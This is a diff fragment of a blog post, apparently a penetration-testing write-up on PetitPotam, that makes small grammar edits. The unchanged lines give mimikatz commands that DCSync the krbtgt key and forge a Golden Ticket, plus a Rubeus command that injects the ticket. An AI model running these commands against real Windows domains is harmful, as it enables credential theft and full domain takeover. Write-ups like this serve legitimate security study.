jakemai0/jakemai0.github.io/content/posts/PetitPotam.md

 # From mimikatz:
 lsadump::dcsync /domain:<domain> /user:krbtgt
 ```
-Once the AES256 encryption key of the krbtgt account was captured, the Golden Ticket could be forged:
+Once the AES256 encryption key of the krbtgt account has been captured, the Golden Ticket could be forged:
 ```
 # From Mimikatz:
 kerberos::golden /user:Administrator /domain:<domain> /sid:<SID of the domain> /aes256:<aes256 key> /ticket:goldie.kirbi
 ```
-Proceeded to inject the Golden Ticket:
+Proceed to inject the Golden Ticket:
 ```
 Rubeus.exe ptt /ticket:goldie.kirbi
 ```